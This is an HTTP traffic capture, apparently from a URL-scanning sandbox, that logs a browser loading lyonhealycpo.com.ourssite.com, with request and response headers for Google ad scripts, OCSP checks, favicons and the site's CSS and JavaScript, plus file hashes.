Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 13 Feb 2018 00:08:56 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    c9d4636863a457668041a772672e56fb
Sha1:   e064eb25e438fce99d824096c4827b2a77cfa396
Sha256: d51bb05c2832a30fbafe0bc2f0e397380faf6faf39185413a3dd5bcea6154674
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 13 Feb 2018 00:08:56 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    6bf50ec404fb4a8b4a94be8390d11938
Sha1:   0caaab7704d6221abc5e0342909a4928cee50b1c
Sha256: 63b592179b1e9a528344ce1d430b9479fc55f43420a468ec35aaeaa9dff911cf
                                        
                                            GET /adsid/integrator.js?domain=lyonhealycpo.com.ourssite.com HTTP/1.1 
Host: adservice.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=UTF-8
                                        
P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
Timing-Allow-Origin: *
Cache-Control: private, no-cache, no-store
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Date: Tue, 13 Feb 2018 00:08:56 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   107
Md5:    5432a558d422eaeaa6f7e8a15c0c1134
Sha1:   252ee6dbb502fd998fbdc5721da5986b877f1c73
Sha256: e61d268069b171358cb5d545e31856cbc3ac2b995cff5e4f7043ae988dc44c6d
                                        
                                            GET /adsid/integrator.js?domain=lyonhealycpo.com.ourssite.com HTTP/1.1 
Host: adservice.google.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=UTF-8
                                        
P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
Timing-Allow-Origin: *
Cache-Control: private, no-cache, no-store
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Date: Tue, 13 Feb 2018 00:08:56 GMT
Server: cafe
X-XSS-Protection: 1; mode=block
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   107
Md5:    5432a558d422eaeaa6f7e8a15c0c1134
Sha1:   252ee6dbb502fd998fbdc5721da5986b877f1c73
Sha256: e61d268069b171358cb5d545e31856cbc3ac2b995cff5e4f7043ae988dc44c6d
                                        
                                            GET /s2/favicons?domain_url=jachthavenbiesbosch.nl HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Tue, 13 Feb 2018 00:08:56 GMT
Date: Tue, 13 Feb 2018 00:08:56 GMT
Cache-Control: private, max-age=86400
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=123=My26PSSpuZe47VvtCKbePFM0bCtrLWF5XX0Vv3Q9JBYFOh_g_xmq69qj3AxL_f5seSCyjYw5L1ZfU8sEZgpWR21gVI6X7W_vKiqy4D3MKsOysra3UezB1BCMvciptjSK;Domain=.google.com;Path=/;Expires=Wed, 15-Aug-2018 00:08:56 GMT;HttpOnly


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGB, non-interlaced
Size:   495
Md5:    bf5cf91588e3d9431c1d0532bfcdf4ea
Sha1:   6de07316f451bf88d6fdb83bbef6c297ac61e1f6
Sha256: 2e94792d796684a71a25b97e6c3c12acfcf60136f713a2df4696126e16e9f13c
                                        
                                            GET /s2/favicons?domain_url=edosen.com HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Tue, 13 Feb 2018 00:08:57 GMT
Date: Tue, 13 Feb 2018 00:08:57 GMT
Cache-Control: private, max-age=28800
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=123=jrhuIk8UlH4_5MB4IcEoi7_sTiTRozTOzwx2EQHhJUGZcmzpUhcSb5qFTMZdiDMc1GkTcoesNGn5o0sC8Ggz6RffpuztRaEUN1S5p8ppsM-lKZNsqHQ3fIMvFu8kT9W7;Domain=.google.com;Path=/;Expires=Wed, 15-Aug-2018 00:08:57 GMT;HttpOnly


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   492
Md5:    3ca64f83fdcf25135d87e08af65e68c9
Sha1:   b82d0979d555bd137b33c15021129e06cbeea59a
Sha256: 2e30ff33270fd8687b0eb4d12652bfd967f23975f158bf8da93bece2ba4ab947
                                        
                                            GET /s2/favicons?domain_url=rescuedirect.com HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Tue, 13 Feb 2018 00:08:57 GMT
Date: Tue, 13 Feb 2018 00:08:57 GMT
Cache-Control: private, max-age=28800
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=123=O_AIpFGRTbcwfGSPpBimPdkuEgssYBzwV9vYCvHV76gBv82etDgWfcod8mXhoWqCNcdu7MFWBTTVKJgABKV-mPppTGy0DGcFjj1KjPsRSPhAp77xy-0NeraoTz8Q8M-B;Domain=.google.com;Path=/;Expires=Wed, 15-Aug-2018 00:08:57 GMT;HttpOnly


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   492
Md5:    3ca64f83fdcf25135d87e08af65e68c9
Sha1:   b82d0979d555bd137b33c15021129e06cbeea59a
Sha256: 2e30ff33270fd8687b0eb4d12652bfd967f23975f158bf8da93bece2ba4ab947
                                        
                                            GET /s2/favicons?domain_url=panditgopalsharma.com HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Tue, 13 Feb 2018 00:08:58 GMT
Date: Tue, 13 Feb 2018 00:08:58 GMT
Cache-Control: private, max-age=86400
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=123=jBNNYUesus7mqTY55UkJjZZDoCilw3Tb9NH_t_GYGQHgqcTyze15B4Kvaqa_HYE-fZbsHk7XH47zIir9BFDDnkmA347_8N2YXFPHjHWBR9o6gy8D5hJL3KyXwqIJWoV0;Domain=.google.com;Path=/;Expires=Wed, 15-Aug-2018 00:08:58 GMT;HttpOnly


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   582
Md5:    322ca540c5a4aec33fea1f0f574c1985
Sha1:   55e31b2a3cce4fd0d55095b82581ac987afdc104
Sha256: 883e65ae31945600ccda378cb75ccc025221b04d14d8a1b327ff3180ab1d4551
                                        
                                            GET /images/logo.png HTTP/1.1 
Host: lyonhealycpo.com.ourssite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         69.197.177.234
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 13 Feb 2018 00:09:23 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Fri, 02 Dec 2016 13:36:52 GMT
Etag: "10ab-542ad07d92500"
Accept-Ranges: bytes
Content-Length: 4267
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image, 87 x 50, 8-bit/color RGBA, non-interlaced
Size:   4267
Md5:    4909f826d7171d97b4a94ffcc4917146
Sha1:   6d77e119f5ceb281c14f4781cd1011c006be0a30
Sha256: cff4e6df81de5e4ffbca51fbfb7c025d18aa9fb0db43db9f18ddba73846d8fce
                                        
                                            GET /css/bootstrap.min.css HTTP/1.1 
Host: lyonhealycpo.com.ourssite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         69.197.177.234
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 13 Feb 2018 00:09:23 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Tue, 29 Nov 2016 04:46:35 GMT
Etag: "1de99-5426945e220c0-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 19881
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   19881
Md5:    e7ed4e0436d499cb2b5368fd4631f5d4
Sha1:   2e576de4167e805203f93a85029645d3ff469227
Sha256: da1c43b0a8b9379b2adb99cb7c4b7b7741409df973c3e2d0ea06cefb44f249c0
                                        
                                            GET /s2/favicons?domain_url=libemavakantieparken.nl HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Tue, 13 Feb 2018 00:09:00 GMT
Date: Tue, 13 Feb 2018 00:09:00 GMT
Cache-Control: private, max-age=86400
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_;Domain=.google.com;Path=/;Expires=Wed, 15-Aug-2018 00:09:00 GMT;HttpOnly


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   620
Md5:    31dd1386073fb8b5c367e4e4bd2406f9
Sha1:   257caf7a642327671f32fbdc8fed4501ad2ba4a1
Sha256: 480fd046d1fa86b7507de2a5335af27d38e24b809fd89d76f1f0dca4734541b9
                                        
                                            GET /css/style.css HTTP/1.1 
Host: lyonhealycpo.com.ourssite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         69.197.177.234
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Tue, 13 Feb 2018 00:09:29 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Thu, 23 Feb 2017 06:22:00 GMT
Etag: "81e-5492ca178f200-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 833
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   833
Md5:    fd31671826b3b6256e47efd67674b727
Sha1:   6ad57285d3e74500227faaf2457d489768d2f5c5
Sha256: 5d355a9f74d28cc0357b75059f66af75b64fd8512b06a66c6af2ec82a623f594
                                        
                                            GET /pagead/js/r20180207/r20170110/show_ads_impl.js HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Tue, 13 Feb 2018 00:09:05 GMT
Expires: Tue, 13 Feb 2018 00:09:05 GMT
Cache-Control: private, max-age=1209600
Etag: 4433304288936196502
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 67646
X-XSS-Protection: 1; mode=block


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   67646
Md5:    cce91a88f525640083b0ebe057a30af4
Sha1:   b9cf4be249b5af3dda774dfb75e73d482da706c5
Sha256: dd6dac5265c4b1796715889313e4b9271b4547f66739424357f89dc45eac882b
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 13 Feb 2018 00:09:05 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    4ca530e2e64ddacca945d3c002bb44b0
Sha1:   67e9be414e344ee77aa371b072f6e1d1a87092f4
Sha256: 8beea0530790ac3ae2b94d2892c4178fd19076b283e32f1e0e0dc560ef8004a0
                                        
                                            GET /graph?u=lyonhealycpo.com HTTP/1.1 
Host: traffic.alexa.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         35.170.0.108
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 13 Feb 2018 00:09:05 GMT
Server: nginx
Via: 1.1 ip-172-30-42-38 (squid/3.5.20)
X-Cache: MISS from ip-172-30-42-38
X-Cache-Lookup: MISS from ip-172-30-42-38:3128
Content-Length: 3762
Connection: keep-alive


--- Additional Info ---
Magic:  PNG image, 340 x 150, 8-bit/color RGB, non-interlaced
Size:   3762
Md5:    48b987be0872dda37c448373048acec0
Sha1:   73a1c4855b600a7711c4da39b9c5faa881d721ac
Sha256: fedff9fe31867e109332057bffa0656cdf551bc30499d96d276436dd158d17a3
                                        
                                            GET /s2/favicons?domain_url=spaceklabs.com HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:05 GMT
Date: Tue, 13 Feb 2018 00:09:05 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 16, 8-bit/color RGBA, non-interlaced
Size:   728
Md5:    cf258a9cf6a76b39dc5ce31a8da5564e
Sha1:   826616549a6bab955c7476d1b0144c5d3d6cadc0
Sha256: 055e0aea4a8a1b831f2187749c88c80ae4430871a0d7a70363dd05683aff4434
                                        
                                            GET /pub-config/r20160913/ca-pub-2222385521793316.js HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 125
Date: Mon, 12 Feb 2018 14:41:22 GMT
Expires: Tue, 13 Feb 2018 02:41:22 GMT
Last-Modified: Sun, 11 Feb 2018 21:27:30 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=43200
Age: 34064
Alt-Svc: hq="googleads.g.doubleclick.net:443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="41,39,38,37,35",hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   125
Md5:    21aea2dae0239adff4f9f063cdacfc76
Sha1:   ce64c497ac1dd86393da79e8cea239de113c1de7
Sha256: a59ee78166b8467dd7dd8c7acb03d8df7d16cf4a04f45c8558366df1c33b868f
                                        
                                            GET /js/amcharts.js HTTP/1.1 
Host: lyonhealycpo.com.ourssite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         69.197.177.234
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 13 Feb 2018 00:09:29 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Wed, 30 Nov 2016 09:38:53 GMT
Etag: "30443-5428179122540-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   56572
Md5:    c5bf696404c38713263f4e8f0bb50bb0
Sha1:   4c6a744b2d3b3e35b83531c11a5bd7d37f96ea6d
Sha256: 7a412f5ef1276a8753e9ab79564588d72e5d7bc4ee4e920f2d8c877f957f7734
                                        
                                            GET /js/jquery-1.11.2.min.js HTTP/1.1 
Host: lyonhealycpo.com.ourssite.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         69.197.177.234
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 13 Feb 2018 00:09:29 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Wed, 30 Nov 2016 09:39:42 GMT
Etag: "176de-542817bfdd380-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 33306
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   33306
Md5:    9d7b11557f97272349d4919322760ab8
Sha1:   1ea68d0f1731fbd8c3924ec0ed797a4f552e4373
Sha256: 821b9113ec291d3baf792b3595dfb095f832d1705756e8784b30055d6564eb91
                                        
                                            GET /s2/favicons?domain_url=wittewieven.nl HTTP/1.1 
Host: www.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/
Cookie: NID=123=SY0ep99IFzYfmY8HuVr2aFj4GxqLZ7GohvzD_vQmbLxr52rhOh6SsfEnhQ0sh7ZiKhs9IvxilG_WSMA-SOBbqYjKGz05Rhb_-IXaxvQTs35YYoAIxajweIXHCx6TUCf_

                                         
                                         172.217.20.36
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Expires: Wed, 14 Feb 2018 00:09:06 GMT
Date: Tue, 13 Feb 2018 00:09:06 GMT
Cache-Control: public, max-age=86400
Content-Security-Policy: script-src 'unsafe-inline' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/FaviconHttp/cspreport
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  PNG image, 16 x 12, 8-bit/color RGB, non-interlaced
Size:   462
Md5:    2fbd8c56b15880972bc787299e613fc2
Sha1:   18b923fb560c13f731f791c8198dddae38495c41
Sha256: 6db2f7f352558db89396d7a0cf7d5ada6dd9acd213789dd84d61b4aee44b4027
                                        
                                            GET /pagead/js/r20180207/r20170110/osd.js HTTP/1.1 
Host: pagead2.googlesyndication.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://lyonhealycpo.com.ourssite.com/

                                         
                                         172.217.21.130
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Wed, 07 Feb 2018 20:56:41 GMT
Expires: Wed, 21 Feb 2018 20:56:41 GMT
Etag: 14152819666964886147
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
